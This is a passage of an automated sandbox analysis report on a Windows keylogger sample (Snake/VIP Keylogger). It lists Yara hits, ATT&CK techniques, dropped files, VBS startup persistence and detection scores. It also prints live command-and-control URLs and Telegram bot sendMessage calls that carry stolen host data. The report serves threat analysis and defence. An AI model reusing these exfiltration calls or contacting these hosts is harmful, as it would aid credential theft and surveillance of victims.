memory
                Source: reindulgence.exeBinary or memory string: WIN_XPe
                Source: reindulgence.exeBinary or memory string: WIN_VISTA
                Source: reindulgence.exeBinary or memory string: WIN_7
                Source: reindulgence.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4503499824.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4503982433.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5488, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5488, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00B21204
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B21806
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00FE1204
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00FE1806
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                2
                Valid Accounts
                11
                Native API
                111
                Scripting
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                121
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts
                2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder
                21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS127
                System Information Discovery
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                1
                Masquerading
                LSA Secrets321
                Security Software Discovery
                SSH121
                Input Capture
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                Cached Domain Credentials111
                Virtualization/Sandbox Evasion
                VNC3
                Clipboard Data
                Multiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Virtualization/Sandbox Evasion
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585976 Sample: oagkiAhXgZ.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 2 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 15 other signatures 2->52 8 oagkiAhXgZ.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\...\reindulgence.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 60 Found API chain indicative of sandbox detection 8->60 14 reindulgence.exe 2 8->14         started        62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->62 18 reindulgence.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\reindulgence.vbs, data 14->28 dropped 64 Antivirus detection for dropped file 14->64 66 Multi AV Scanner detection for dropped file 14->66 68 Binary is likely a compiled AutoIt script file 14->68 74 4 other signatures 14->74 20 RegSvcs.exe 15 2 14->20         started        70 Writes to foreign memory regions 18->70 72 Maps a DLL or memory area into another process 18->72 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 132.226.247.73, 49704, 49707, 49709 UTMEMUS United States 20->36 38 api.telegram.org 149.154.167.220, 443, 49726, 49844 TELEGRAMRU United Kingdom 20->38 40 reallyfreegeoip.org 188.114.96.3, 443, 49705, 49706 CLOUDFLARENETUS European Union 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                oagkiAhXgZ.exe63%ReversingLabsWin32.Spyware.Snakekeylogger
                oagkiAhXgZ.exe100%AviraHEUR/AGEN.1319493
                oagkiAhXgZ.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Thebesian\reindulgence.exe100%AviraHEUR/AGEN.1319493
                C:\Users\user\AppData\Local\Thebesian\reindulgence.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Thebesian\reindulgence.exe63%ReversingLabsWin32.Exploit.VIPKeylogger
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://anotherarmy.dns.army:8081100%Avira URL Cloudphishing
                http://aborters.duckdns.org:8081100%Avira URL Cloudphishing
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                http://varders.kozow.com:8081100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.96.3
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegSvcs.exe, 00000007.00000002.4503982433.00000000031E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgRegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botreindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/lBRegSvcs.exe, 00000003.00000002.4503499824.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000031DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000007.00000002.4503982433.00000000031B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://aborters.duckdns.org:8081reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://anotherarmy.dns.army:8081reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: phishing
                                                              unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://checkip.dyndns.org/qreindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.4503499824.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000031AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.4503499824.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002988000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4503499824.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000303E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedreindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://reallyfreegeoip.org/xml/reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000303E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              149.154.167.220
                                                                              api.telegram.orgUnited Kingdom
                                                                              62041TELEGRAMRUfalse
                                                                              188.114.96.3
                                                                              reallyfreegeoip.orgEuropean Union
                                                                              13335CLOUDFLARENETUSfalse
                                                                              132.226.247.73
                                                                              checkip.dyndns.comUnited States
                                                                              16989UTMEMUSfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1585976
                                                                              Start date and time:2025-01-08 15:43:08 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 10m 12s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:9
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:oagkiAhXgZ.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:fef805cfe8df23b5e42e59c3505ba7b9014c2cf3e9ac9346b3badba3c086053c.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 99%
                                                                              • Number of executed functions: 51
                                                                              • Number of non-executed functions: 296
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • VT rate limit hit for: oagkiAhXgZ.exe
                                                                              TimeTypeDescription
                                                                              09:44:06API Interceptor13352497x Sleep call for process: RegSvcs.exe modified
                                                                              15:44:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              149.154.167.220proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                    random.exeGet hashmaliciousCStealerBrowse
                                                                                      HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                                UpdaterTool.exeGet hashmaliciousUnknownBrowse
                                                                                                  188.114.96.3GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                                                  • /api/get/dll
                                                                                                  Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                  QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • filetransfer.io/data-package/u7ghXEYp/download
                                                                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.mffnow.info/1a34/
                                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.mydreamdeal.click/1ag2/
                                                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.questmatch.pro/ipd6/
                                                                                                  QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                  need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.rtpwslot888gol.sbs/jmkz/
                                                                                                  QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                  http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                  • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  reallyfreegeoip.orgVSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.96.3
                                                                                                  ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.97.3
                                                                                                  Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.97.3
                                                                                                  New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                  • 188.114.97.3
                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 188.114.97.3
                                                                                                  MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.97.3
                                                                                                  FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.97.3
                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  checkip.dyndns.comVSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 193.122.130.0
                                                                                                  ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 193.122.130.0
                                                                                                  fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 132.226.247.73
                                                                                                  Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 132.226.247.73
                                                                                                  New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                  • 193.122.6.168
                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
